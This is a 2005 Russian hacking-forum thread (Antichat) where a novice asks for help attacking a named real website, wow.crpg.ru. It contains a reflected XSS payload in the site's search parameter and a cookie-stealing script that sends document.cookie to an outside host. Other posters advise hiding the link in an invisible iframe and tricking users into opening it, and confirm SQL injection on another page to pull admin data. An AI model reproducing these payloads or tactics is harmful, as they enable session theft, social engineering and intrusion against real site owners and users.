Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Нашел дыру, но не знаю че делать дальше - помогите новичку :) (https://forum.antichat.xyz/showthread.php?t=7215)

m4e 15.06.2005 12:08
Нашел дыру, но не знаю че делать дальше - помогите новичку :)
 
Привет всем, я нашел дыру вот тут -

1. http://wow.crpg.ru/search.php
если сделать так:
http://wow.crpg.ru/search.php?query=></td></tr></form></table><script>alert(document.cookie);</script

то вроде все получается, однако это же нечеловечно, хотелось бы поцивелизованнее чтоли... в общем не знаю как и что еще можно оттуда извлечь...

2. а еще там же дыра -
http://wow.crpg.ru/printfeature.php?artid=
если ввести после равно qwerty то выпадает в ошибку базы. Как можно провести хацк? :rolleyes:

FoX's 15.06.2005 12:57
1 Можно украсть куки.

2 Это по ходу не дыра.. А ошибка в скрипте.

Rebz 15.06.2005 13:34
Угу, второй случай - просто обработка этого qwerty и иже с ними неправильна. Вот скрипт и ругается. Посмотрел бы сам вначале, чем тревогу бить.. видно же что кроме пути к файлу, здесь больше ничё не выцепишь.

А по 1 случаю. ХЗ. помоему хрен что сделаешь)). Хотя я не смотрел, признаюсь).

m4e 15.06.2005 13:34
Цитата:
Сообщение от FoX's
1 Можно украсть куки.

Тык как цивилизованно украсть то? не пошлешь же ссылку вида
http://wow.crpg.ru/search.php?query=></td></tr></form></table><script>img = new Image(); img.src =<a href="http://antichat.ru/cgi-bin/s.jpg">+document.cookie;</script>

Как-бы ее запрятать так, чтоб явно не торчала...

KEZ 15.06.2005 13:45
А ошибка в скрипте - не дыра? ))

FoX's 15.06.2005 13:48
нет...

JazzzSummerMan 15.06.2005 13:48
КЕЗ не всегда.
"))))"

KEZ 15.06.2005 13:53
нет, конечно если там написано
fopem вместо fopen то да, это вообще ничего работать небудет,
но в данном случае это и ест дыра

m4e 15.06.2005 14:09
Ближе к теме, мальчики и девочки :)
с похожей ссылкой удалось сделать дефейс сменой картинки бекграунда, но опять же увидишь, только если полностью набить адрес+код в експлорере...

censored! 15.06.2005 17:21
Цитата:
Тык как цивилизованно украсть то?
Сначала выясни - что хранится в куках. Если там есть пасс (хэш пасса), то просто создаешь страницу с нулевым (невидимым фреймом) где ссылка на этот фрейм будет та которую ты нашел. И после всего этого пишешь или по личке или еще кому-нить - так мол и так. Гляньте на страницу (чтобы глянули - прояви фантазию).

p.s. только сначала проверь чтобы все фурычило, иногда неполучится куку перхватить

m0nzt3r 15.06.2005 17:50
а во второй ссылке разве нету Скуль Инж-а?

Егорыч+++ 15.06.2005 17:53
есть там инъекция

m0nzt3r 15.06.2005 17:58
я и про это =)) а то сказали что нету во второй ничего это просто ошибка...там же написано что ошибка в мускуле...значит есть вероятность инжекшена

m4e 15.06.2005 18:13
Тык примерчик напишите, хуч... ато уже от видеохаков глаза болят :)

Я понимаю что нужно выполнить запрос, но не могу воткнуть как

m0nzt3r 15.06.2005 23:49
я не силен в мускл но обычный запроса типа 999'СЕЛЕКТ админ ФРОМ юзерз не сработал )))

virgoz 16.06.2005 00:58
Осталось только подставить where с именем пользователя:
Спать хочу, не могу =)

m4e 17.06.2005 09:16
ыы... а дальше что? Чувствую себя тупым как буратино : (

virgoz 17.06.2005 20:11
Странно, что не работает. Ошибки нет, имена столбцов тоже правильно угаданы. =) Может кто знает почему?

m0nzt3r 17.06.2005 23:16
странно...)

FoBE 22.06.2005 20:43
Да, очень странно :)

byte57 22.06.2005 21:08
ну, не выводит, надо менять местами ник, чтобы найти где выводит его

virgoz 23.06.2005 15:45
Ты бы попробовал вначале. Выводятся 3,4,7 столбцы


Время: 12:00